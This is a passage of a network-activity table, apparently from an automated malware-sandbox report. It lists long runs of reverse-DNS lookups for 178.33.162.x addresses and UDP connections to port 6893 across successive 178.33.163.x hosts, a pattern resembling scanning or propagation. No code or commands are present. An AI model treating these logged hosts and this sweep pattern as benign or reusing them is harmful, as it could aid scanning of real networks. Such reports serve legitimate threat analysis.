| US | 8.8.8.8:53 | 209.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 247.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 255.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.162.33.178.in-addr.arpa | udp |
| FR | 178.33.162.255:6893 | udp | |
| FR | 178.33.163.0:6893 | udp | |
| FR | 178.33.163.1:6893 | udp | |
| FR | 178.33.163.2:6893 | udp | |
| FR | 178.33.163.3:6893 | udp | |
| FR | 178.33.163.4:6893 | udp | |
| FR | 178.33.163.5:6893 | udp | |
| FR | 178.33.163.6:6893 | udp | |
| FR | 178.33.163.7:6893 | udp | |
| FR | 178.33.163.8:6893 | udp | |
| FR | 178.33.163.9:6893 | udp | |
| FR | 178.33.163.10:6893 | udp | |
| FR | 178.33.163.11:6893 | udp | |
| FR | 178.33.163.12:6893 | udp | |
| FR | 178.33.163.13:6893 | udp | |
| FR | 178.33.163.14:6893 | udp | |
| FR | 178.33.163.15:6893 | udp | |
| FR | 178.33.163.16:6893 | udp | |
| FR | 178.33.163.17:6893 | udp | |
| FR | 178.33.163.18:6893 | udp | |
| FR | 178.33.163.19:6893 | udp | |
| FR | 178.33.163.20:6893 | udp | |
| US | 8.8.8.8:53 | 144.162.33.178.in-addr.arpa | udp |
| FR | 178.33.163.21:6893 | udp | |
| FR | 178.33.163.22:6893 | udp | |
| FR | 178.33.163.23:6893 | udp | |
| FR | 178.33.163.24:6893 | udp | |
| FR | 178.33.163.25:6893 | udp | |
| FR | 178.33.163.26:6893 | udp | |
| FR | 178.33.163.27:6893 | udp | |
| FR | 178.33.163.28:6893 | udp | |
| FR | 178.33.163.29:6893 | udp | |
| FR | 178.33.163.30:6893 | udp | |
| FR | 178.33.163.31:6893 | udp | |
| FR | 178.33.163.32:6893 | udp | |
| FR | 178.33.163.33:6893 | udp | |
| FR | 178.33.163.34:6893 | udp | |
| FR | 178.33.163.35:6893 | udp | |
| FR | 178.33.163.36:6893 | udp | |
| FR | 178.33.163.37:6893 | udp | |
| FR | 178.33.163.38:6893 | udp | |
| FR | 178.33.163.39:6893 | udp | |
| FR | 178.33.163.40:6893 | udp | |
| FR | 178.33.163.41:6893 | udp | |
| FR | 178.33.163.42:6893 | udp | |
| FR | 178.33.163.43:6893 | udp | |
| FR | 178.33.163.44:6893 | udp | |
| FR | 178.33.163.45:6893 | udp | |
| FR | 178.33.163.46:6893 | udp | |
| FR | 178.33.163.47:6893 | udp | |
| FR | 178.33.163.48:6893 | udp | |
| FR | 178.33.163.49:6893 | udp | |
| FR | 178.33.163.50:6893 | udp | |
| FR | 178.33.163.51:6893 | udp | |
| FR | 178.33.163.52:6893 | udp | |
| FR | 178.33.163.53:6893 | udp | |
| FR | 178.33.163.54:6893 | udp | |
| FR | 178.33.163.55:6893 | udp | |
| FR | 178.33.163.56:6893 | udp | |
| FR | 178.33.163.57:6893 | udp | |
| FR | 178.33.163.58:6893 | udp | |
| FR | 178.33.163.59:6893 | udp | |
| FR | 178.33.163.60:6893 | udp | |
| FR | 178.33.163.61:6893 | udp | |
| FR | 178.33.163.62:6893 | udp | |
| FR | 178.33.163.63:6893 | udp | |
| FR | 178.33.163.64:6893 | udp | |
| FR | 178.33.163.65:6893 | udp | |
| FR | 178.33.163.66:6893 | udp | |
| FR | 178.33.163.67:6893 | udp | |
| FR | 178.33.163.68:6893 | udp | |
| FR | 178.33.163.69:6893 | udp | |
| FR | 178.33.163.70:6893 | udp | |
| FR | 178.33.163.71:6893 | udp | |
| FR | 178.33.163.72:6893 | udp | |
| FR | 178.33.163.73:6893 | udp | |
| FR | 178.33.163.74:6893 | udp | |
| FR | 178.33.163.75:6893 | udp | |
| FR | 178.33.163.76:6893 | udp | |
| FR | 178.33.163.77:6893 | udp | |
| FR | 178.33.163.78:6893 | udp | |
| FR | 178.33.163.79:6893 | udp | |
| FR | 178.33.163.80:6893 | udp | |
| FR | 178.33.163.81:6893 | udp | |
| FR | 178.33.163.82:6893 | udp | |
| FR | 178.33.163.83:6893 | udp | |
| FR | 178.33.163.84:6893 | udp | |
| FR | 178.33.163.85:6893 | udp | |
| FR | 178.33.163.86:6893 | udp | |
| FR | 178.33.163.87:6893 | udp | |
| US | 8.8.8.8:53 | 146.162.33.178.in-addr.arpa | udp |
| FR | 178.33.163.88:6893 | udp | |
| FR | 178.33.163.89:6893 | udp | |
| FR | 178.33.163.90:6893 | udp | |
| FR | 178.33.163.91:6893 | udp | |
| FR | 178.33.163.92:6893 | udp | |
| FR | 178.33.163.93:6893 | udp | |
| FR | 178.33.163.94:6893 | udp | |
| FR | 178.33.163.95:6893 | udp | |
| FR | 178.33.163.96:6893 | udp | |
| FR | 178.33.163.97:6893 | udp | |
| FR | 178.33.163.98:6893 | udp | |
| FR | 178.33.163.99:6893 | udp | |
| FR | 178.33.163.100:6893 | udp | |
| FR | 178.33.163.101:6893 | udp | |
| FR | 178.33.163.102:6893 | udp | |
| FR | 178.33.163.103:6893 | udp | |
| FR | 178.33.163.104:6893 | udp | |
| FR | 178.33.163.105:6893 | udp | |
| FR | 178.33.163.106:6893 | udp | |
| FR | 178.33.163.107:6893 | udp | |
| FR | 178.33.163.108:6893 | udp | |
| FR | 178.33.163.109:6893 | udp | |
| FR | 178.33.163.110:6893 | udp | |
| FR | 178.33.163.111:6893 | udp | |
| FR | 178.33.163.112:6893 | udp | |
| FR | 178.33.163.113:6893 | udp | |
| FR | 178.33.163.114:6893 | udp | |
| FR | 178.33.163.115:6893 | udp | |
| FR | 178.33.163.116:6893 | udp | |
| FR | 178.33.163.117:6893 | udp | |
| FR | 178.33.163.118:6893 | udp | |
| FR | 178.33.163.119:6893 | udp | |
| FR | 178.33.163.120:6893 | udp | |
| FR | 178.33.163.121:6893 | udp | |
| FR | 178.33.163.122:6893 | udp | |
| FR | 178.33.163.123:6893 | udp | |
| FR | 178.33.163.124:6893 | udp | |
| FR | 178.33.163.125:6893 | udp | |
| FR | 178.33.163.126:6893 | udp | |
| FR | 178.33.163.127:6893 | udp | |
| FR | 178.33.163.128:6893 | udp | |
| FR | 178.33.163.129:6893 | udp | |
| FR | 178.33.163.130:6893 | udp | |
| FR | 178.33.163.131:6893 | udp | |
| FR | 178.33.163.132:6893 | udp | |
| FR | 178.33.163.133:6893 | udp | |
| FR | 178.33.163.134:6893 | udp | |
| FR | 178.33.163.135:6893 | udp | |
| FR | 178.33.163.136:6893 | udp | |
| FR | 178.33.163.137:6893 | udp | |
| FR | 178.33.163.138:6893 | udp | |
| FR | 178.33.163.139:6893 | udp | |
| FR | 178.33.163.140:6893 | udp | |
| FR | 178.33.163.141:6893 | udp | |
| FR | 178.33.163.142:6893 | udp | |
| FR | 178.33.163.143:6893 | udp | |
| FR | 178.33.163.144:6893 | udp | |
| FR | 178.33.163.145:6893 | udp | |
| FR | 178.33.163.146:6893 | udp | |
| FR | 178.33.163.147:6893 | udp | |
| FR | 178.33.163.148:6893 | udp | |
| FR | 178.33.163.149:6893 | udp | |
| FR | 178.33.163.150:6893 | udp | |
| FR | 178.33.163.151:6893 | udp | |
| FR | 178.33.163.152:6893 | udp | |
| FR | 178.33.163.153:6893 | udp | |
| FR | 178.33.163.154:6893 | udp | |
| FR | 178.33.163.155:6893 | udp | |
| FR | 178.33.163.156:6893 | udp | |
| FR | 178.33.163.157:6893 | udp | |
| FR | 178.33.163.158:6893 | udp | |
| FR | 178.33.163.159:6893 | udp | |
| FR | 178.33.163.160:6893 | udp | |
| FR | 178.33.163.161:6893 | udp | |
| FR | 178.33.163.162:6893 | udp | |
| FR | 178.33.163.163:6893 | udp | |
| FR | 178.33.163.164:6893 | udp | |
| FR | 178.33.163.165:6893 | udp | |
| FR | 178.33.163.166:6893 | udp | |
| FR | 178.33.163.167:6893 | udp | |
| FR | 178.33.163.168:6893 | udp | |
| FR | 178.33.163.169:6893 | udp | |
| FR | 178.33.163.170:6893 | udp | |
| FR | 178.33.163.171:6893 | udp | |
| FR | 178.33.163.172:6893 | udp | |
| FR | 178.33.163.173:6893 | udp | |
| FR | 178.33.163.174:6893 | udp | |
| FR | 178.33.163.175:6893 | udp | |
| FR | 178.33.163.176:6893 | udp | |
| FR | 178.33.163.177:6893 | udp | |
| FR | 178.33.163.178:6893 | udp | |
| FR | 178.33.163.179:6893 | udp | |
| FR | 178.33.163.180:6893 | udp | |
| FR | 178.33.163.181:6893 | udp | |
| FR | 178.33.163.182:6893 | udp | |
| FR | 178.33.163.183:6893 | udp | |
| FR | 178.33.163.184:6893 | udp | |
| FR | 178.33.163.185:6893 | udp | |
| FR | 178.33.163.186:6893 | udp | |
| FR | 178.33.163.187:6893 | udp | |
| FR | 178.33.163.188:6893 | udp | |
| FR | 178.33.163.189:6893 | udp | |
| FR | 178.33.163.190:6893 | udp | |
| FR | 178.33.163.191:6893 | udp | |
| FR | 178.33.163.192:6893 | udp | |
| FR | 178.33.163.193:6893 | udp | |
| FR | 178.33.163.194:6893 | udp | |
| FR | 178.33.163.195:6893 | udp | |
| FR | 178.33.163.196:6893 | udp | |
| FR | 178.33.163.197:6893 | udp | |
| FR | 178.33.163.198:6893 | udp | |
| FR | 178.33.163.199:6893 | udp | |
| FR | 178.33.163.200:6893 | udp | |
| FR | 178.33.163.201:6893 | udp | |
| FR | 178.33.163.202:6893 | udp | |
| FR | 178.33.163.203:6893 | udp | |
| FR | 178.33.163.204:6893 | udp | |
| FR | 178.33.163.205:6893 | udp | |
| FR | 178.33.163.206:6893 | udp | |
| FR | 178.33.163.207:6893 | udp | |
| FR | 178.33.163.208:6893 | udp | |
| FR | 178.33.163.209:6893 | udp | |
| FR | 178.33.163.210:6893 | udp | |
| FR | 178.33.163.211:6893 | udp | |
| FR | 178.33.163.212:6893 | udp | |
| FR | 178.33.163.213:6893 | udp | |
| FR | 178.33.163.214:6893 | udp | |
| US | 8.8.8.8:53 | 147.162.33.178.in-addr.arpa | udp |
| FR | 178.33.163.215:6893 | udp | |
| FR | 178.33.163.216:6893 | udp | |
| FR | 178.33.163.217:6893 | udp | |
| FR | 178.33.163.218:6893 | udp | |
| FR | 178.33.163.219:6893 | udp | |
| FR | 178.33.163.220:6893 | udp | |
| FR | 178.33.163.221:6893 | udp | |
| FR | 178.33.163.222:6893 | udp | |
| FR | 178.33.163.223:6893 | udp | |
| FR | 178.33.163.224:6893 | udp | |
| FR | 178.33.163.225:6893 | udp | |
| FR | 178.33.163.226:6893 | udp | |
| FR | 178.33.163.227:6893 | udp | |
| FR | 178.33.163.228:6893 | udp | |
| FR | 178.33.163.229:6893 | udp | |
| FR | 178.33.163.230:6893 | udp | |
| FR | 178.33.163.231:6893 | udp | |
| FR | 178.33.163.232:6893 | udp | |
| FR | 178.33.163.233:6893 | udp | |
| FR | 178.33.163.234:6893 | udp | |
| FR | 178.33.163.235:6893 | udp | |
| FR | 178.33.163.236:6893 | udp | |
| FR | 178.33.163.237:6893 | udp | |
| FR | 178.33.163.238:6893 | udp | |
| FR | 178.33.163.239:6893 | udp | |
| FR | 178.33.163.240:6893 | udp | |
| FR | 178.33.163.241:6893 | udp | |
| FR | 178.33.163.242:6893 | udp | |
| FR | 178.33.163.243:6893 | udp | |
| FR | 178.33.163.244:6893 | udp | |
| FR | 178.33.163.245:6893 | udp | |
| FR | 178.33.163.246:6893 | udp | |
| FR | 178.33.163.247:6893 | udp | |
| FR | 178.33.163.248:6893 | udp | |
| FR | 178.33.163.249:6893 | udp | |
| FR | 178.33.163.250:6893 | udp | |
| FR | 178.33.163.251:6893 | udp | |
| FR | 178.33.163.252:6893 | udp | |
| FR | 178.33.163.253:6893 | udp | |
| FR | 178.33.163.254:6893 | udp | |
| US | 8.8.8.8:53 | 148.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.162.33.178.in-addr.arpa | udp |
